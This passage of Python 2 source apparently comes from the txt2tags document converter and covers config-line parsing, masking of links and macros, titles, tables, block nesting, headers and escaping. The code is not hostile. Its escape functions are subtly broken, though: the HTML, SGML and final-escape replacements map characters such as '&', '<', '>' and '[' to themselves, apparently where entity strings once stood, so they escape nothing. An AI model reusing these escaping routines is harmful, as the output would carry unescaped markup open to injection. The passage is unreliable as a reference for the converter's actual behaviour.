ret.append([target, key, val])
Message(_("Added %s")%key,3)
return ret
def parse_line(self, line='', keyname='', target=''):
"Detects %!key:val config lines and extract data from it"
empty = ['', '', '']
if not line: return empty
no_target = ['target', 'includeconf']
re_name = keyname or '[a-z]+'
re_target = target or '[a-z]*'
cfgregex = re.compile("""
^%%!\s* # leading id with opt spaces
(?P<name>%s)\s* # config name
(\((?P<target>%s)\))? # optional target spec inside ()
\s*:\s* # key:value delimiter with opt spaces
(?P<value>\S.+?) # config value
\s*$ # rstrip() spaces and hit EOL
"""%(re_name,re_target), re.I+re.VERBOSE)
prepostregex = re.compile("""
# ---[ PATTERN ]---
^( "([^"]*)" # "double quoted" or
| '([^']*)' # 'single quoted' or
| ([^\s]+) # single_word
)
\s+ # separated by spaces
# ---[ REPLACE ]---
( "([^"]*)" # "double quoted" or
| '([^']*)' # 'single quoted' or
| (.*) # anything
)
\s*$
""", re.VERBOSE)
guicolors = re.compile("^([^\s]+\s+){3}[^\s]+") # 4 tokens
match = cfgregex.match(line)
if not match: return empty
name = string.lower(match.group('name') or '')
target = string.lower(match.group('target') or 'all')
value = match.group('value')
# NO target keywords: force all targets
if name in no_target: target = 'all'
# special config for GUI colors
if name == 'guicolors':
valmatch = guicolors.search(value)
if not valmatch: return empty
value = re.split('\s+', value)
# Special config with two quoted values (%!preproc: "foo" 'bar')
if name in ['preproc','postproc']:
valmatch = prepostregex.search(value)
if not valmatch: return empty
getval = valmatch.group
patt = getval(2) or getval(3) or getval(4) or ''
repl = getval(6) or getval(7) or getval(8) or ''
value = (patt, repl)
return [target, name, value]
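# Worked examples (illustrative): parse_line() tokenizes one '%!key(target):value'
# line, forcing the 'all' target when none (or a no-target keyword) is given.
#
#   ConfigLines().parse_line('%!target: html')
#   # -> ['all', 'target', 'html']
#   ConfigLines().parse_line('%!options(tex): --enum-title')
#   # -> ['tex', 'options', '--enum-title']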
##############################################################################
class MaskMaster:
"(Un)Protect important structures from escaping and formatting"
def __init__(self):
self.linkmask = '@@_link_@@'
self.monomask = '@@_mono_@@'
self.macromask = '@@_macro_@@'
self.rawmask = '@@_raw_@@'
self.reset()
def reset(self):
self.linkbank = []
self.monobank = []
self.macrobank = []
self.rawbank = []
def mask(self, line=''):
# protect raw text
while regex['raw'].search(line):
txt = regex['raw'].search(line).group(1)
txt = doEscape(TARGET,txt)
self.rawbank.append(txt)
line = regex['raw'].sub(self.rawmask,line,1)
# protect pre-formatted font text
while regex['fontMono'].search(line):
txt = regex['fontMono'].search(line).group(1)
txt = doEscape(TARGET,txt)
self.monobank.append(txt)
line = regex['fontMono'].sub(self.monomask,line,1)
# protect macros
while regex['macro'].search(line):
txt = regex['macro'].search(line).group()
self.macrobank.append(txt)
line = regex['macro'].sub(self.macromask,line,1)
# protect URLs and emails
while regex['linkmark'].search(line) or \
regex['link' ].search(line):
# try to match plain or named links
match_link = regex['link'].search(line)
match_named = regex['linkmark'].search(line)
# define the current match
if match_link and match_named:
# both types found, which is the first?
m = match_link
if match_named.start() < match_link.start():
m = match_named
else:
# just one type found, we're fine
m = match_link or match_named
# extract link data and apply mask
if m == match_link: # plain link
link = m.group()
label = ''
link_re = regex['link']
else: # named link
link = m.group('link')
label = string.rstrip(m.group('label'))
link_re = regex['linkmark']
line = link_re.sub(self.linkmask,line,1)
# save link data to the link bank
self.linkbank.append((label, link))
return line
def undo(self, line):
# url & email
for label,url in self.linkbank:
link = get_tagged_link(label, url)
line = string.replace(line, self.linkmask, link, 1)
# expand macros
for macro in self.macrobank:
line = string.replace(line, self.macromask, macro,1)
if self.macrobank:
line = doDateMacro(line)
# expand verb
for mono in self.monobank:
open,close = TAGS['fontMonoOpen'],TAGS['fontMonoClose']
tagged = open+mono+close
line = string.replace(line,self.monomask,tagged,1)
# expand raw
for raw in self.rawbank:
line = string.replace(line,self.rawmask,raw,1)
return line
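# Usage sketch (illustrative): mask() swaps links, monospaced text, macros and
# raw text by private placeholders, so the escaping and beautifying steps
# can't damage them; undo() puts the (now tagged) contents back afterwards.
#
#   mm = MaskMaster()
#   masked = mm.mask('see [txt2tags http://txt2tags.sf.net] for details')
#   # ... escaping / font beautifiers run over the masked line ...
#   line = mm.undo(masked)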
##############################################################################
class TitleMaster:
"Title things"
def __init__(self):
self.count = ['',0,0,0,0,0]
self.toc = []
self.level = 0
self.kind = ''
self.txt = ''
self.label = ''
self.tag = ''
self.count_id = ''
self.user_labels = {}
self.anchor_count = 0
self.anchor_prefix = 'toc'
def add(self, line):
"Parses a new title line."
if not line: return
self._set_prop(line)
self._set_count_id()
self._set_label()
self._save_toc_info()
def _save_toc_info(self):
"Save TOC info, used by self.dump_marked_toc()"
self.toc.append((self.level, self.count_id,
self.txt , self.label ))
def _set_prop(self, line=''):
"Extract info from original line and set data holders."
# detect title type (numbered or not)
id = string.lstrip(line)[0]
if id == '=': kind = 'title'
elif id == '+': kind = 'numtitle'
else: Error("Unknown Title ID '%s'"%id)
# extract line info
match = regex[kind].search(line)
level = len(match.group('id'))
txt = string.strip(match.group('txt'))
label = match.group('label')
# parse info & save
if CONF['enum-title']: kind = 'numtitle' # force
self.tag = TAGS[kind+`level`] or TAGS['title'+`level`]
self.kind = kind
self.level = level
self.txt = txt
self.label = label
def _set_count_id(self):
"Compose and save the title count identifier (if needed)."
count_id = ''
if self.kind == 'numtitle' and not rules['autonumbertitle']:
# manually increase title count
self.count[self.level] = self.count[self.level] +1
# reset sublevels count (if any)
max_levels = len(self.count)
if self.level < max_levels-1:
for i in range(self.level+1, max_levels):
self.count[i] = 0
# compose count id from hierarchy
for i in range(self.level):
count_id= "%s%d."%(count_id, self.count[i+1])
self.count_id = count_id
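	# Numbering sketch (illustrative): count_id is built from the levels
	# hierarchy, so the 3rd '+++' title under numbered section 2.1 gets
	# count_id '2.1.3.' (note the trailing dot) prepended to its text.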
def _set_label(self):
"Compose and save title label, used by anchors."
# remove invalid chars from label set by user
self.label = re.sub('[^A-Za-z0-9_]', '', self.label or '')
# generate name as 15 first :alnum: chars
#TODO how to translate safely accented chars to plain?
#self.label = re.sub('[^A-Za-z0-9]', '', self.txt)[:15]
# 'tocN' label - sequential count, ignoring 'toc-level'
#self.label = self.anchor_prefix + str(len(self.toc)+1)
def _get_tagged_anchor(self):
"Return anchor if user defined a label, or TOC is on."
ret = ''
label = self.label
if CONF['toc'] and self.level <= CONF['toc-level']:
			# this count is needed because self.toc stores all
			# titles, regardless of the 'toc-level' setting,
			# so we can't use the self.toc length to number anchors
self.anchor_count = self.anchor_count + 1
# autonumber label (if needed)
label = label or '%s%s'%(
self.anchor_prefix, self.anchor_count)
if label and TAGS['anchor']:
ret = regex['x'].sub(label,TAGS['anchor'])
return ret
def _get_full_title_text(self):
"Returns the full title contents, already escaped."
ret = self.txt
# insert count_id (if any) before text
if self.count_id:
ret = '%s %s'%(self.count_id, ret)
# escape specials
ret = doEscape(TARGET, ret)
		# some targets need final escapes on title lines
# it's here because there is a 'continue' after title
if rules['finalescapetitle']:
ret = doFinalEscape(TARGET, ret)
return ret
def get(self):
"Returns the tagged title as a list."
ret = []
# maybe some anchoring before?
anchor = self._get_tagged_anchor()
self.tag = regex['_anchor'].sub(anchor, self.tag)
### compose & escape title text (TOC uses unescaped)
full_title = self._get_full_title_text()
# finish title, adding "underline" on TXT target
tagged = regex['x'].sub(full_title, self.tag)
if TARGET == 'txt':
ret.append('') # blank line before
ret.append(tagged)
ret.append(regex['x'].sub('='*len(full_title),self.tag))
ret.append('') # blank line after
else:
ret.append(tagged)
return ret
def dump_marked_toc(self, max_level=99):
"Dumps all toc itens as a valid t2t markup list"
#TODO maybe use quote+linebreaks instead lists
ret = []
toc_count = 1
for level, count_id, txt, label in self.toc:
if level > max_level: continue # ignore
indent = ' '*level
id_txt = string.lstrip('%s %s'%(count_id, txt))
label = label or self.anchor_prefix+`toc_count`
toc_count = toc_count + 1
# TOC will have links
if TAGS['anchor']:
				# TOC is more readable with master topics
				# not linked at number. This is an idea
				# stolen from Windows .CHM help files
if CONF['enum-title'] and level == 1:
tocitem = '%s+ [""%s"" #%s]'%(
indent, txt, label)
else:
tocitem = '%s- [""%s"" #%s]'%(
indent, id_txt, label)
# no links on TOC, just text
else:
				# man doesn't reformat TOC lines, cool!
if TARGET in ['txt', 'man']:
tocitem = '%s""%s""' %(
indent, id_txt)
else:
tocitem = '%s- ""%s""'%(
indent, id_txt)
ret.append(tocitem)
return ret
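	# Output sketch (illustrative): each saved title becomes one t2t list
	# item, indented by its level; when anchors exist the item is a named
	# link like '  - [""2.1. Section name"" #toc3]', otherwise plain text.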
##############################################################################
#TODO check all this table mess
# handles TABLE lines, using the properties from parse_row
# the BLOCK table() method hacks in and swaps the cells with the parsed ones
class TableMaster:
def __init__(self, line=''):
self.rows = []
self.border = 0
self.align = 'Left'
self.cellalign = []
if line:
prop = self.parse_row(line)
self.border = prop['border']
self.align = prop['align']
self.cellalign = prop['cellalign']
def _get_open_tag(self):
topen = TAGS['tableOpen']
tborder = TAGS['tableBorder']
talign = TAGS['tableAlign'+self.align]
calignsep = TAGS['tableColAlignSep']
calign = ''
# the first line defines if table has border or not
if not self.border: tborder = ''
# set the columns alignment
if rules['tablecellaligntype'] == 'column':
calign = map(lambda x: TAGS['tableColAlign%s'%x],
self.cellalign)
calign = string.join(calign, calignsep)
# align full table, set border and Column align (if any)
topen = regex['_tableAlign' ].sub(talign , topen)
topen = regex['_tableBorder' ].sub(tborder, topen)
topen = regex['_tableColAlign'].sub(calign , topen)
# tex table spec, border or not: {|l|c|r|} , {lcr}
if calignsep and not self.border:
# remove cell align separator
topen = string.replace(topen, calignsep, '')
return topen
def _get_cell_align(self, cells):
ret = []
for cell in cells:
align = 'Left'
if string.strip(cell):
if cell[0] == ' ' and cell[-1] == ' ':
align = 'Center'
elif cell[0] == ' ':
align = 'Right'
ret.append(align)
return ret
def _tag_cells(self, rowdata):
row = []
cells = rowdata['cells']
open = TAGS['tableCellOpen']
close = TAGS['tableCellClose']
sep = TAGS['tableCellSep']
calign = map(lambda x: TAGS['tableCellAlign'+x],
rowdata['cellalign'])
		# maybe it's a title row?
if rowdata['title']:
open = TAGS['tableTitleCellOpen'] or open
close = TAGS['tableTitleCellClose'] or close
sep = TAGS['tableTitleCellSep'] or sep
# should we break the line on *each* table cell?
if rules['breaktablecell']: close = close+'\n'
# cells pre processing
if rules['tablecellstrip']:
cells = map(lambda x: string.strip(x), cells)
if rowdata['title'] and rules['tabletitlerowinbold']:
cells = map(lambda x: enclose_me('fontBold',x), cells)
# add cell BEGIN/END tags
for cell in cells:
# insert cell align into open tag (if cell is alignable)
if rules['tablecellaligntype'] == 'cell':
copen = string.replace(open,'\a',calign.pop(0))
else:
copen = open
row.append(copen + cell + close)
# maybe there are cell separators?
return string.join(row, sep)
def add_row(self, cells):
self.rows.append(cells)
def parse_row(self, line):
		# default table properties
ret = {'border':0,'title':0,'align':'Left',
'cells':[],'cellalign':[]}
# detect table align (and remove spaces mark)
if line[0] == ' ': ret['align'] = 'Center'
line = string.lstrip(line)
# detect title mark
if line[1] == '|': ret['title'] = 1
# delete trailing spaces after last cell border
line = re.sub('\|\s*$','|', line)
# detect (and delete) border mark (and leading space)
if line[-1] == '|': ret['border'] = 1 ; line = line[:-2]
# delete table mark
line = regex['table'].sub('', line)
# split cells
ret['cells'] = string.split(line, ' | ')
# find cells align
ret['cellalign'] = self._get_cell_align(ret['cells'])
Debug('Table Prop: %s' % ret, 2)
return ret
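	# Worked example (illustrative): a row like '| aa | bb |' comes out as
	# {'border':1, 'title':0, 'align':'Left', 'cells':['aa','bb'],
	#  'cellalign':['Left','Left']}; a leading space centers the table and
	# a double pipe '|| ' marks a title row.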
def dump(self):
open = self._get_open_tag()
rows = self.rows
close = TAGS['tableClose']
rowopen = TAGS['tableRowOpen']
rowclose = TAGS['tableRowClose']
rowsep = TAGS['tableRowSep']
titrowopen = TAGS['tableTitleRowOpen'] or rowopen
titrowclose = TAGS['tableTitleRowClose'] or rowclose
if rules['breaktablelineopen']:
rowopen = rowopen + '\n'
titrowopen = titrowopen + '\n'
# tex gotchas
if TARGET == 'tex':
if not self.border:
rowopen = titrowopen = ''
else:
close = rowopen + close
# now we tag all the table cells on each row
#tagged_cells = map(lambda x: self._tag_cells(x), rows) #!py15
tagged_cells = []
for cell in rows: tagged_cells.append(self._tag_cells(cell))
# add row separator tags between lines
tagged_rows = []
if rowsep:
#!py15
#tagged_rows = map(lambda x:x+rowsep, tagged_cells)
for cell in tagged_cells:
tagged_rows.append(cell+rowsep)
# remove last rowsep, because the table is over
tagged_rows[-1] = string.replace(
tagged_rows[-1], rowsep, '')
# add row BEGIN/END tags for each line
else:
for rowdata in rows:
if rowdata['title']:
o,c = titrowopen, titrowclose
else:
o,c = rowopen, rowclose
row = tagged_cells.pop(0)
tagged_rows.append(o + row + c)
fulltable = [open] + tagged_rows + [close]
if rules['blankendtable']: fulltable.append('')
return fulltable
##############################################################################
class BlockMaster:
"TIP: use blockin/out to add/del holders"
def __init__(self):
self.BLK = []
self.HLD = []
self.PRP = []
self.depth = 0
self.last = ''
self.tableparser = None
self.contains = {
'para' :['passthru','raw'],
'verb' :[],
'table' :[],
'raw' :[],
'passthru':[],
'quote' :['quote','passthru','raw'],
'list' :['list' ,'numlist' ,'deflist','para','verb',
'raw' ,'passthru'],
'numlist' :['list' ,'numlist' ,'deflist','para','verb',
'raw' ,'passthru'],
'deflist' :['list' ,'numlist' ,'deflist','para','verb',
'raw' ,'passthru']
}
self.allblocks = self.contains.keys()
def block(self):
if not self.BLK: return ''
return self.BLK[-1]
def isblock(self, name=''):
return self.block() == name
def prop(self, key):
if not self.PRP: return ''
return self.PRP[-1].get(key) or ''
def propset(self, key, val):
self.PRP[-1][key] = val
#Debug('BLOCK prop ++: %s->%s'%(key,repr(val)), 1)
#Debug('BLOCK props: %s'%(repr(self.PRP)), 1)
def hold(self):
if not self.HLD: return []
return self.HLD[-1]
def holdadd(self, line):
if self.block()[-4:] == 'list': line = [line]
self.HLD[-1].append(line)
Debug('HOLD add: %s'%repr(line), 5)
Debug('FULL HOLD: %s'%self.HLD, 2)
def holdaddsub(self, line):
self.HLD[-1][-1].append(line)
Debug('HOLD addsub: %s'%repr(line), 5)
Debug('FULL HOLD: %s'%self.HLD, 2)
def holdextend(self, lines):
if self.block()[-4:] == 'list': lines = [lines]
self.HLD[-1].extend(lines)
Debug('HOLD extend: %s'%repr(lines), 5)
Debug('FULL HOLD: %s'%self.HLD, 2)
def blockin(self, block):
ret = []
if block not in self.allblocks:
Error("Invalid block '%s'"%block)
# first, let's close other possible open blocks
while self.block() and block not in self.contains[self.block()]:
ret.extend(self.blockout())
# now we can gladly add this new one
self.BLK.append(block)
self.HLD.append([])
self.PRP.append({})
if block == 'table': self.tableparser = TableMaster()
# deeper and deeper
self.depth = len(self.BLK)
Debug('block ++ (%s): %s' % (block,self.BLK), 6)
return ret
def blockout(self):
if not self.BLK: Error('No block to pop')
self.last = self.BLK.pop()
tagged = getattr(self, self.last)()
parsed = self.HLD.pop()
self.PRP.pop()
self.depth = len(self.BLK)
if self.last == 'table': del self.tableparser
# inserting a nested block into mother
if self.block():
if self.block()[-4:] == 'list':
self.HLD[-1][-1].append(tagged)
else:
self.HLD[-1].append(tagged)
tagged = [] # reset. mother will have it all
Debug('block -- (%s): %s' % (self.last,self.BLK), 6)
Debug('RELEASED (%s): %s' % (self.last,parsed), 6)
if tagged: Debug('DUMPED: %s'%tagged, 2)
return tagged
def _last_escapes(self, line):
return doFinalEscape(TARGET, line)
def _get_escaped_hold(self):
ret = []
for line in self.hold():
linetype = type(line)
if linetype == type(''):
ret.append(self._last_escapes(line))
elif linetype == type([]):
ret.extend(line)
else:
Error("BlockMaster: Unknown HOLD item type:"
" %s"%linetype)
return ret
def _remove_twoblanks(self, lastitem):
if len(lastitem) > 1 and lastitem[-2:] == ['','']:
return lastitem[:-2]
return lastitem
def passthru(self):
return self.hold()
def raw(self):
lines = self.hold()
return map(lambda x: doEscape(TARGET, x), lines)
def para(self):
tagged = []
open = TAGS['paragraphOpen']
close = TAGS['paragraphClose']
lines = self._get_escaped_hold()
# open (or not) paragraph
if not open+close and self.last == 'para':
pass # avoids multiple blank lines
else:
tagged.append(open)
# pagemaker likes a paragraph as a single long line
if rules['onelinepara']:
tagged.append(string.join(lines,' '))
# others are normal :)
else:
tagged.extend(lines)
tagged.append(close)
# very very very very very very very very very UGLY fix
# needed because <center> can't appear inside <p>
try:
if len(lines) == 1 and \
TARGET in ('html', 'xhtml') and \
re.match('^\s*<center>.*</center>\s*$', lines[0]):
tagged = [lines[0]]
except: pass
return tagged
def verb(self):
"Verbatim lines are not masked, so there's no need to unmask"
tagged = []
tagged.append(TAGS['blockVerbOpen'])
for line in self.hold():
if not rules['verbblocknotescaped']:
line = doEscape(TARGET,line)
if rules['indentverbblock']:
line = ' '+line
if rules['verbblockfinalescape']:
line = doFinalEscape(TARGET, line)
tagged.append(line)
#TODO maybe use if not TAGS['blockVerbClose']
if TARGET != 'pm6':
tagged.append(TAGS['blockVerbClose'])
return tagged
def table(self):
# rewrite all table cells by the unmasked and escaped data
lines = self._get_escaped_hold()
for i in range(len(lines)):
cells = string.split(lines[i], SEPARATOR)
self.tableparser.rows[i]['cells'] = cells
return self.tableparser.dump()
def quote(self):
tagged = []
myre = regex['quote']
open = TAGS['blockQuoteOpen'] # block based
close = TAGS['blockQuoteClose']
qline = TAGS['blockQuoteLine'] # line based
indent = tagindent = '\t'*self.depth
if rules['tagnotindentable']: tagindent = ''
if not rules['keepquoteindent']: indent = ''
if open: tagged.append(tagindent+open) # open block
for item in self.hold():
if type(item) == type([]):
tagged.extend(item) # subquotes
else:
item = myre.sub('', item) # del TABs
if rules['barinsidequote']:
item = get_tagged_bar(item)
item = self._last_escapes(item)
item = qline*self.depth + item
tagged.append(indent+item) # quote line
if close: tagged.append(tagindent+close) # close block
return tagged
def deflist(self): return self.list('deflist')
def numlist(self): return self.list('numlist')
def list(self, name='list'):
tagged = []
items = self.hold()
indent = self.prop('indent')
tagindent = indent
listopen = TAGS.get(name+'Open')
listclose = TAGS.get(name+'Close')
listline = TAGS.get(name+'ItemLine')
itemcount = 0
if rules['tagnotindentable']: tagindent = ''
if not rules['keeplistindent']: indent = ''
if name == 'deflist':
itemopen = TAGS[name+'Item1Open']
itemclose = TAGS[name+'Item2Close']
itemsep = TAGS[name+'Item1Close']+\
TAGS[name+'Item2Open']
else:
itemopen = TAGS[name+'ItemOpen']
itemclose = TAGS[name+'ItemClose']
itemsep = ''
# ItemLine: number of leading chars identifies list depth
if listline:
itemopen = listline*self.depth
# dirty fix for mgp
if name == 'numlist': itemopen = itemopen + '\a. '
# remove two-blanks from list ending mark, to avoid <p>
items[-1] = self._remove_twoblanks(items[-1])
		# open list (non-nestable lists are only opened at the mother list)
if listopen and not \
(rules['listnotnested'] and BLOCK.depth != 1):
tagged.append(tagindent+listopen)
		# tag each list item (multiline items)
itemopenorig = itemopen
for item in items:
# add "manual" item count for noautonum targets
itemcount = itemcount + 1
if name == 'numlist' and not rules['autonumberlist']:
n = str(itemcount)
itemopen = regex['x'].sub(n, itemopenorig)
del n
item[0] = self._last_escapes(item[0])
if name == 'deflist':
term, rest = string.split(item[0],SEPARATOR,1)
item[0] = rest
if not item[0]: del item[0] # to avoid <p>
tagged.append(tagindent+itemopen+term+itemsep)
else:
fullitem = tagindent+itemopen
tagged.append(string.replace(
item[0], SEPARATOR, fullitem))
del item[0]
# process next lines for this item (if any)
for line in item:
if type(line) == type([]): # sublist inside
tagged.extend(line)
else:
line = self._last_escapes(line)
# blank lines turns to <p>
if not line and rules['parainsidelist']:
line = string.rstrip(indent +\
TAGS['paragraphOpen']+\
TAGS['paragraphClose'])
if not rules['keeplistindent']:
line = string.lstrip(line)
tagged.append(line)
# close item (if needed)
if itemclose: tagged.append(tagindent+itemclose)
		# close list (non-nestable lists are only closed at the mother list)
if listclose and not \
(rules['listnotnested'] and BLOCK.depth != 1):
tagged.append(tagindent+listclose)
if rules['blankendmotherlist'] and BLOCK.depth == 1:
tagged.append('')
return tagged
##############################################################################
def dumpConfig(source_raw, parsed_config):
onoff = {1:_('ON'), 0:_('OFF')}
data = [
(_('RC file') , RC_RAW ),
(_('source document'), source_raw ),
(_('command line') , CMDLINE_RAW)
]
# first show all RAW data found
for label, cfg in data:
print _('RAW config for %s')%label
for target,key,val in cfg:
target = '(%s)'%target
key = dotted_spaces("%-14s"%key)
val = val or _('ON')
print ' %-8s %s: %s'%(target,key,val)
print
# then the parsed results of all of them
print _('Full PARSED config')
keys = parsed_config.keys() ; keys.sort() # sorted
for key in keys:
val = parsed_config[key]
# filters are the last
if key in ['preproc', 'postproc']:
continue
# flag beautifier
if key in FLAGS.keys()+ACTIONS.keys():
val = onoff.get(val) or val
# list beautifier
if type(val) == type([]):
if key == 'options': sep = ' '
else : sep = ', '
val = string.join(val, sep)
print "%25s: %s"%(dotted_spaces("%-14s"%key),val)
print
print _('Active filters')
for filter in ['preproc','postproc']:
for rule in parsed_config.get(filter) or []:
print "%25s: %s -> %s"%(
dotted_spaces("%-14s"%filter),rule[0],rule[1])
def get_file_body(file):
"Returns all the document BODY lines"
return process_source_file(file, noconf=1)[1][2]
def finish_him(outlist, config):
"Writing output to screen or file"
outfile = config['outfile']
outlist = unmaskEscapeChar(outlist)
# do PostProc
if config['postproc']:
postoutlist = []
errmsg = _('Invalid PostProc filter regex')
for line in outlist:
for patt,repl in config['postproc']:
try : line = re.sub(patt, repl, line)
except: Error("%s: '%s'"% (errmsg,patt))
postoutlist.append(line)
outlist = postoutlist[:]
if outfile == STDOUT:
if GUI:
return outlist, config
else:
for line in outlist: print line
else:
Savefile(outfile, addLineBreaks(outlist))
if not GUI: print _('%s wrote %s')%(my_name,outfile)
if config['split']:
print "--- html..."
sgml2html = 'sgml2html -s %s -l %s %s'%(
config['split'],config['lang'] or lang,outfile)
print "Running system command:", sgml2html
os.system(sgml2html)
def toc_maker(toc, config):
"Compose TOC list 'by hand'"
ret = []
# TOC is a tag, so there's nothing to do here
if TAGS['TOC'] and not config['toc-only']: return []
# TOC is a valid t2t marked text (list type), that is converted
if config['toc'] or config['toc-only']:
fakeconf = config.copy()
fakeconf['headers'] = 0
fakeconf['toc-only'] = 0
fakeconf['mask-email'] = 0
fakeconf['preproc'] = []
fakeconf['postproc'] = []
fakeconf['css-suggar'] = 0
ret,foo = convert(toc, fakeconf)
# TOC between bars (not for --toc-only)
if config['toc']:
if TAGS['tocOpenCss'] and config['css-suggar']:
ret = [TAGS['tocOpenCss']] +ret +[TAGS['tocCloseCss']]
else:
para = TAGS['paragraphOpen']+TAGS['paragraphClose']
tag = regex['x'].sub('-'*72,TAGS['bar1'])
tocbar = [para, tag, para]
ret = tocbar + ret + tocbar
open, close = TAGS['tocOpen'], TAGS['tocClose']
if open : ret = [open] + ret
if close: ret = ret + [close]
return ret
def doHeader(headers, config):
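	# Build the target header: fill STYLE, ENCODING and the three header lines
	# into the target's HEADER_TEMPLATE, removing references to empty values
	# (a template line is dropped when nothing else remains on it)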
if not config['headers']: return []
if not headers: headers = ['','','']
target = config['target']
if not HEADER_TEMPLATE.has_key(target):
Error("doheader: Unknow target '%s'"%target)
if target in ['html','xhtml'] and config.get('css-suggar'):
template = string.split(HEADER_TEMPLATE[target+'css'], '\n')
else:
template = string.split(HEADER_TEMPLATE[target], '\n')
head_data = {'STYLE':'', 'ENCODING':''}
for key in head_data.keys():
val = config.get(string.lower(key))
if key == 'ENCODING': val = get_encoding_string(val, target)
head_data[key] = val
# parse header contents
for i in 0,1,2:
contents = doDateMacro(headers[i]) # expand %%date
# Escapes - on tex, just do it if any \tag{} present
if target != 'tex' or \
(target == 'tex' and re.search(r'\\\w+{', contents)):
contents = doEscape(target, contents)
head_data['HEADER%d'%(i+1)] = contents
Debug("Header Data: %s"%head_data, 1)
# scan for empty dictionary keys
# if found, scan template lines for that key reference
# if found, remove the reference
# if there isn't any other key reference on the same line, remove it
for key in head_data.keys():
if head_data.get(key): continue
for line in template:
if string.count(line, '%%(%s)s'%key):
sline = string.replace(line, '%%(%s)s'%key, '')
if not re.search(r'%\([A-Z0-9]+\)s', sline):
template.remove(line)
# populate template with data
template = string.join(template, '\n') % head_data
### post processing
#
# let tex format today
	# DISABLED: not a good idea to have a different date format on tex
#if target == 'tex' and head_data['HEADER3'] == currdate:
# template = re.sub(r'\\date\{.*?}', r'\date', template)
return string.split(template, '\n')
def doDateMacro(line):
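	# Expand every %%date and %%date(format) macro on the line to the current date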
re_date = getRegexes()['date']
while re_date.search(line):
m = re_date.search(line)
fmt = m.group('fmt') or ''
dateme = currdate
if fmt: dateme = strftime(fmt,localtime(time()))
line = re_date.sub(dateme,line,1)
return line
def doCommentLine(txt):
# the -- string ends a (h|sg|xht)ml comment :(
txt = maskEscapeChar(txt)
if string.count(TAGS['comment'], '--') and \
string.count(txt, '--'):
txt = re.sub('-(?=-)', r'-\\', txt)
if TAGS['comment']:
return regex['x'].sub(txt, TAGS['comment'])
return ''
def doFooter(config):
if not config['headers']: return []
ret = []
target = config['target']
cmdline = config['realcmdline']
typename = target
if target == 'tex': typename = 'LaTeX2e'
ppgd = '%s code generated by %s %s (%s)'%(
typename,my_name,my_version,my_url)
cmdline = 'cmdline: %s %s'%(my_name, string.join(cmdline, ' '))
ret.append('\n'+doCommentLine(ppgd))
ret.append(doCommentLine(cmdline))
ret.append(TAGS['EOD'])
return ret
def doEscape(target,txt):
"Target-specific special escapes. Apply *before* insert any tag."
if target in ['html','sgml','xhtml']:
txt = re.sub('&','&',txt)
txt = re.sub('<','<',txt)
txt = re.sub('>','>',txt)
if target == 'sgml':
txt = re.sub('\xff','ÿ',txt) # "+y
elif target == 'pm6':
txt = re.sub('<','<\#60>',txt)
elif target == 'mgp':
txt = re.sub('^%',' %',txt) # add leading blank to avoid parse
elif target == 'man':
txt = re.sub("^([.'])", '\\&\\1',txt) # command ID
txt = string.replace(txt,ESCCHAR, ESCCHAR+'e') # \e
elif target == 'tex':
# mark literal \ to be changed to $\backslash$ later
txt = string.replace( txt, ESCCHAR, '@@LaTeX-escaping-SUX@@')
txt = re.sub('([#$&%{}])', ESCCHAR+r'\1' , txt) # \%
txt = re.sub('([~^])' , ESCCHAR+r'\1{}', txt) # \~{}
txt = re.sub('([<|>])' , r'$\1$', txt) # $>$
txt = string.replace(txt, '@@LaTeX-escaping-SUX@@',
maskEscapeChar(r'$\backslash$'))
# TIP the _ is escaped at the end
return txt
# TODO man: where does - really need to be escaped?
def doFinalEscape(target, txt):
"Last escapes of each line"
if target == 'pm6' : txt = string.replace(txt,ESCCHAR+'<',r'<\#92><')
elif target == 'man' : txt = string.replace(txt, '-', r'\-')
elif target == 'tex' : txt = string.replace(txt, '_', r'\_')
elif target == 'sgml': txt = string.replace(txt, '[', '[')
return txt
def EscapeCharHandler(action, data):
"Mask/Unmask the Escape Char on the given string"
if not string.strip(data): return data
if action not in ['mask','unmask']:
Error("EscapeCharHandler: Invalid action '%s'"%action)
if action == 'mask': return string.replace(data,'\\',ESCCHAR)
else: return string.replace(data,ESCCHAR,'\\')
def maskEscapeChar(data):
"Replace any Escape Char \ with a text mask (Input: str or list)"
if type(data) == type([]):
return map(lambda x: EscapeCharHandler('mask', x), data)
return EscapeCharHandler('mask',data)
def unmaskEscapeChar(data):
"Undo the Escape char \ masking (Input: str or list)"
if type(data) == type([]):
return map(lambda x: EscapeCharHandler('unmask', x), data)
return EscapeCharHandler('unmask',data)
def addLineBreaks(list):
"use LB to respect sys.platform"
ret = []
for line in list:
line = string.replace(line,'\n',LB) # embedded \n's
ret.append(line+LB) # add final line break
return ret
def enclose_me(tagname, txt):
return TAGS.get(tagname+'Open') + txt + TAGS.get(tagname+'Close')
def beautify_me(name, line):
"where name is: bold, italic or underline"
name = 'font%s' % string.capitalize(name)
open = TAGS['%sOpen'%name]
close = TAGS['%sClose'%name]
txt = r'%s\1%s'%(open, close)
line = regex[name].sub(txt,line)
return line
def get_tagged_link(label, url):
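	# Build the target tag for a link: bare URL/e-mail (optionally masked),
	# guessed www/ftp URL, or labeled [label url], escaping as the target requires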
ret = ''
target = CONF['target']
image_re = regex['img']
# set link type
if regex['email'].match(url):
linktype = 'email'
else:
linktype = 'url';
# escape specials from TEXT parts
label = doEscape(target,label)
# escape specials from link URL
if rules['linkable'] and rules['escapeurl']:
url = doEscape(target, url)
# if not linkable, the URL is plain text, that needs escape
if not rules['linkable']:
if target == 'tex':
url = re.sub('^#', '\#', url) # ugly, but compile
else:
url = doEscape(target,url)
# adding protocol to guessed link
guessurl = ''
if linktype == 'url' and \
re.match(regex['_urlskel']['guess'], url):
if url[0] == 'w': guessurl = 'http://' +url
else : guessurl = 'ftp://' +url
# not link aware targets -> protocol is useless
if not rules['linkable']: guessurl = ''
# simple link (not guessed)
if not label and not guessurl:
if CONF['mask-email'] and linktype == 'email':
# do the email mask feature (no TAGs, just text)
url = string.replace(url,'@',' (a) ')
url = string.replace(url,'.',' ')
url = "<%s>" % url
if rules['linkable']: url = doEscape(target, url)
ret = url
else:
# just add link data to tag
tag = TAGS[linktype]
ret = regex['x'].sub(url,tag)
# named link or guessed simple link
else:
# adjusts for guessed link
if not label: label = url # no protocol
if guessurl : url = guessurl # with protocol
# image inside link!
if image_re.match(label):
if rules['imglinkable']: # get image tag
label = parse_images(label)
else: # img@link !supported
label = "(%s)"%image_re.match(label).group(1)
# putting data on the right appearance order
if rules['linkable']:
urlorder = [url, label] # link before label
else:
urlorder = [label, url] # label before link
# add link data to tag (replace \a's)
ret = TAGS["%sMark"%linktype]
for data in urlorder:
ret = regex['x'].sub(data,ret,1)
return ret
def parse_deflist_term(line):
"Extract and parse definition list term contents"
